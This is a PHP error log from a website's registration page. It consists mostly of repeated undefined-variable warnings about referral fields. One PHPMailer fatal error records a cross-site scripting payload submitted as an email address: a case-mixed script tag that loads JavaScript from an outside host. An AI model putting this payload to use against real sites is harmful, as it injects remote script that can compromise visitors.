[07-Mar-2024 23:54:49 UTC] PHP Warning:  Undefined variable $ref in /home/centenia/public_html/register.php on line 176
[07-Mar-2024 23:54:49 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/centenia/public_html/register.php on line 176
[07-Mar-2024 23:54:49 UTC] PHP Warning:  Undefined variable $ref_id in /home/centenia/public_html/register.php on line 187
[10-Mar-2024 18:47:27 UTC] PHP Warning:  Undefined variable $ref in /home/centenia/public_html/register.php on line 176
[10-Mar-2024 18:47:27 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/centenia/public_html/register.php on line 176
[10-Mar-2024 18:47:27 UTC] PHP Warning:  Undefined variable $ref_id in /home/centenia/public_html/register.php on line 187
[19-Mar-2024 08:52:37 UTC] PHP Warning:  Undefined variable $ref in /home/centenia/public_html/register.php on line 176
[19-Mar-2024 08:52:37 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/centenia/public_html/register.php on line 176
[19-Mar-2024 08:52:37 UTC] PHP Warning:  Undefined variable $ref_id in /home/centenia/public_html/register.php on line 187
[20-Mar-2024 21:01:53 UTC] PHP Warning:  Undefined variable $ref in /home/centenia/public_html/register.php on line 176
[20-Mar-2024 21:01:53 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/centenia/public_html/register.php on line 176
[20-Mar-2024 21:01:53 UTC] PHP Warning:  Undefined variable $ref_id in /home/centenia/public_html/register.php on line 187
[01-Apr-2024 14:45:36 UTC] PHP Warning:  Undefined variable $ref in /home/centenia/public_html/register.php on line 176
[01-Apr-2024 14:45:36 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/centenia/public_html/register.php on line 176
[01-Apr-2024 14:45:36 UTC] PHP Warning:  Undefined variable $ref_id in /home/centenia/public_html/register.php on line 187
[02-Apr-2024 02:39:19 UTC] PHP Warning:  Undefined variable $ref in /home/centenia/public_html/register.php on line 176
[02-Apr-2024 02:39:19 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/centenia/public_html/register.php on line 176
[02-Apr-2024 02:39:19 UTC] PHP Warning:  Undefined variable $ref_id in /home/centenia/public_html/register.php on line 187
[02-Apr-2024 02:43:39 UTC] PHP Warning:  Undefined variable $ref in /home/centenia/public_html/register.php on line 176
[02-Apr-2024 02:43:39 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/centenia/public_html/register.php on line 176
[02-Apr-2024 02:43:39 UTC] PHP Warning:  Undefined variable $ref_id in /home/centenia/public_html/register.php on line 187
[13-Apr-2024 22:15:41 UTC] PHP Warning:  Undefined variable $ref in /home/centenia/public_html/register.php on line 176
[13-Apr-2024 22:15:41 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/centenia/public_html/register.php on line 176
[13-Apr-2024 22:15:41 UTC] PHP Warning:  Undefined variable $ref_id in /home/centenia/public_html/register.php on line 187
[15-Apr-2024 13:45:43 UTC] PHP Warning:  Undefined variable $ref in /home/centenia/public_html/register.php on line 176
[15-Apr-2024 13:45:43 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/centenia/public_html/register.php on line 176
[15-Apr-2024 13:45:43 UTC] PHP Warning:  Undefined variable $ref_id in /home/centenia/public_html/register.php on line 187
[20-Apr-2024 20:50:55 UTC] PHP Warning:  Undefined variable $ref in /home/centenia/public_html/register.php on line 176
[20-Apr-2024 20:50:55 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/centenia/public_html/register.php on line 176
[20-Apr-2024 20:50:55 UTC] PHP Warning:  Undefined variable $ref_id in /home/centenia/public_html/register.php on line 187
[24-Apr-2024 10:15:42 UTC] PHP Warning:  Undefined variable $ref in /home/centenia/public_html/register.php on line 176
[24-Apr-2024 10:15:42 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/centenia/public_html/register.php on line 176
[24-Apr-2024 10:15:42 UTC] PHP Warning:  Undefined variable $ref_id in /home/centenia/public_html/register.php on line 187
[27-Apr-2024 10:30:11 UTC] PHP Warning:  Undefined variable $ref in /home/centenia/public_html/register.php on line 176
[27-Apr-2024 10:30:11 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/centenia/public_html/register.php on line 176
[27-Apr-2024 10:30:11 UTC] PHP Warning:  Undefined variable $ref_id in /home/centenia/public_html/register.php on line 187
[01-May-2024 15:17:12 UTC] PHP Warning:  Undefined variable $ref in /home/centenia/public_html/register.php on line 176
[01-May-2024 15:17:12 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/centenia/public_html/register.php on line 176
[01-May-2024 15:17:12 UTC] PHP Warning:  Undefined variable $ref_id in /home/centenia/public_html/register.php on line 187
[02-May-2024 12:03:18 UTC] PHP Warning:  Undefined variable $ref in /home/centenia/public_html/register.php on line 176
[02-May-2024 12:03:18 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/centenia/public_html/register.php on line 176
[02-May-2024 12:03:18 UTC] PHP Warning:  Undefined variable $ref_id in /home/centenia/public_html/register.php on line 187
[07-May-2024 03:56:43 UTC] PHP Warning:  Undefined variable $ref in /home/centenia/public_html/register.php on line 176
[07-May-2024 03:56:43 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/centenia/public_html/register.php on line 176
[07-May-2024 03:56:43 UTC] PHP Warning:  Undefined variable $ref_id in /home/centenia/public_html/register.php on line 187
[08-May-2024 15:00:40 UTC] PHP Warning:  Undefined variable $ref in /home/centenia/public_html/register.php on line 176
[08-May-2024 15:00:40 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/centenia/public_html/register.php on line 176
[08-May-2024 15:00:40 UTC] PHP Warning:  Undefined variable $ref_id in /home/centenia/public_html/register.php on line 187
[13-May-2024 18:27:06 UTC] PHP Warning:  Undefined variable $ref in /home/centenia/public_html/register.php on line 176
[13-May-2024 18:27:06 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/centenia/public_html/register.php on line 176
[13-May-2024 18:27:06 UTC] PHP Warning:  Undefined variable $ref_id in /home/centenia/public_html/register.php on line 187
[17-May-2024 09:33:07 UTC] PHP Warning:  Undefined variable $ref in /home/centenia/public_html/register.php on line 176
[17-May-2024 09:33:07 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/centenia/public_html/register.php on line 176
[17-May-2024 09:33:07 UTC] PHP Warning:  Undefined variable $ref_id in /home/centenia/public_html/register.php on line 187
[20-May-2024 02:41:07 UTC] PHP Warning:  Undefined variable $ref in /home/centenia/public_html/register.php on line 176
[20-May-2024 02:41:07 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/centenia/public_html/register.php on line 176
[20-May-2024 02:41:07 UTC] PHP Warning:  Undefined variable $ref_id in /home/centenia/public_html/register.php on line 187
[21-May-2024 20:47:45 UTC] PHP Warning:  Undefined variable $ref in /home/centenia/public_html/register.php on line 176
[21-May-2024 20:47:45 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/centenia/public_html/register.php on line 176
[21-May-2024 20:47:45 UTC] PHP Warning:  Undefined variable $ref_id in /home/centenia/public_html/register.php on line 187
[29-May-2024 16:01:54 UTC] PHP Warning:  Undefined variable $ref in /home/aekhjudu/public_html/register.php on line 176
[29-May-2024 16:01:54 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/aekhjudu/public_html/register.php on line 176
[29-May-2024 16:01:54 UTC] PHP Warning:  Undefined variable $ref_id in /home/aekhjudu/public_html/register.php on line 187
[28-Jun-2024 08:53:53 UTC] PHP Warning:  Undefined variable $ref in /home/aekhjudu/public_html/register.php on line 176
[28-Jun-2024 08:53:53 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/aekhjudu/public_html/register.php on line 176
[28-Jun-2024 08:53:53 UTC] PHP Warning:  Undefined variable $ref_id in /home/aekhjudu/public_html/register.php on line 187
[04-Jul-2024 07:04:09 UTC] PHP Warning:  Undefined variable $ref in /home/aekhjudu/public_html/register.php on line 176
[04-Jul-2024 07:04:09 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/aekhjudu/public_html/register.php on line 176
[04-Jul-2024 07:04:09 UTC] PHP Warning:  Undefined variable $ref_id in /home/aekhjudu/public_html/register.php on line 187
[10-Jul-2024 07:31:24 UTC] PHP Warning:  Undefined variable $ref in /home/aekhjudu/public_html/register.php on line 176
[10-Jul-2024 07:31:24 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/aekhjudu/public_html/register.php on line 176
[10-Jul-2024 07:31:24 UTC] PHP Warning:  Undefined variable $ref_id in /home/aekhjudu/public_html/register.php on line 187
[10-Jul-2024 07:31:24 UTC] PHP Fatal error:  Uncaught PHPMailer\PHPMailer\Exception: Invalid address:  (to): <sCRiPt/sRC=//e0l.co/s/></sCrIpT>emlene@mail.com in /home/aekhjudu/public_html/PHPMailer/vendor/phpmailer/phpmailer/src/PHPMailer.php:1157
Stack trace:
#0 [internal function]: PHPMailer\PHPMailer\PHPMailer->addAnAddress('to', '<sCRiPt/sRC=//e...', '')
#1 /home/aekhjudu/public_html/PHPMailer/vendor/phpmailer/phpmailer/src/PHPMailer.php(1116): call_user_func_array(Array, Array)
#2 /home/aekhjudu/public_html/PHPMailer/vendor/phpmailer/phpmailer/src/PHPMailer.php(1014): PHPMailer\PHPMailer\PHPMailer->addOrEnqueueAnAddress('to', '<sCRiPt/sRC=//e...', '')
#3 /home/aekhjudu/public_html/mail.php(78): PHPMailer\PHPMailer\PHPMailer->addAddress('<sCRiPt/sRC=//e...')
#4 /home/aekhjudu/public_html/register.php(205): sendmail('<sCRiPt/sRC=//e...', 'OTP Verificatio...', '<p>Your one tim...')
#5 {main}
  thrown in /home/aekhjudu/public_html/PHPMailer/vendor/phpmailer/phpmailer/src/PHPMailer.php on line 1157
[13-Jul-2024 11:19:42 UTC] PHP Warning:  Undefined variable $ref in /home/aekhjudu/public_html/register.php on line 176
[13-Jul-2024 11:19:42 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/aekhjudu/public_html/register.php on line 176
[13-Jul-2024 11:19:42 UTC] PHP Warning:  Undefined variable $ref_id in /home/aekhjudu/public_html/register.php on line 187
[28-Jul-2024 15:26:15 UTC] PHP Warning:  Undefined variable $ref in /home/aekhjudu/public_html/register.php on line 176
[28-Jul-2024 15:26:15 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/aekhjudu/public_html/register.php on line 176
[28-Jul-2024 15:26:15 UTC] PHP Warning:  Undefined variable $ref_id in /home/aekhjudu/public_html/register.php on line 187
[28-Jul-2024 16:43:54 UTC] PHP Warning:  Undefined variable $ref in /home/aekhjudu/public_html/register.php on line 176
[28-Jul-2024 16:43:54 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/aekhjudu/public_html/register.php on line 176
[28-Jul-2024 16:43:54 UTC] PHP Warning:  Undefined variable $ref_id in /home/aekhjudu/public_html/register.php on line 187
[30-Jul-2024 12:09:31 UTC] PHP Warning:  Undefined variable $ref in /home/aekhjudu/public_html/register.php on line 176
[30-Jul-2024 12:09:31 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/aekhjudu/public_html/register.php on line 176
[30-Jul-2024 12:09:31 UTC] PHP Warning:  Undefined variable $ref_id in /home/aekhjudu/public_html/register.php on line 187
[30-Jul-2024 18:27:21 UTC] PHP Warning:  Undefined variable $ref in /home/aekhjudu/public_html/register.php on line 176
[30-Jul-2024 18:27:21 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/aekhjudu/public_html/register.php on line 176
[30-Jul-2024 18:27:21 UTC] PHP Warning:  Undefined variable $ref_id in /home/aekhjudu/public_html/register.php on line 187
[04-Aug-2024 12:32:52 UTC] PHP Warning:  Undefined variable $ref in /home/aekhjudu/public_html/register.php on line 176
[04-Aug-2024 12:32:52 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/aekhjudu/public_html/register.php on line 176
[04-Aug-2024 12:32:52 UTC] PHP Warning:  Undefined variable $ref_id in /home/aekhjudu/public_html/register.php on line 187
[06-Aug-2024 08:45:18 UTC] PHP Warning:  Undefined variable $ref in /home/aekhjudu/public_html/register.php on line 176
[06-Aug-2024 08:45:18 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/aekhjudu/public_html/register.php on line 176
[06-Aug-2024 08:45:19 UTC] PHP Warning:  Undefined variable $ref_id in /home/aekhjudu/public_html/register.php on line 187
[07-Aug-2024 16:50:12 UTC] PHP Warning:  Undefined variable $ref in /home/aekhjudu/public_html/register.php on line 176
[07-Aug-2024 16:50:12 UTC] PHP Warning:  Undefined variable $ref_bonus in /home/aekhjudu/public_html/register.php on line 176
[07-Aug-2024 16:50:12 UTC] PHP Warning:  Undefined variable $ref_id in /home/aekhjudu/public_html/register.php on line 187
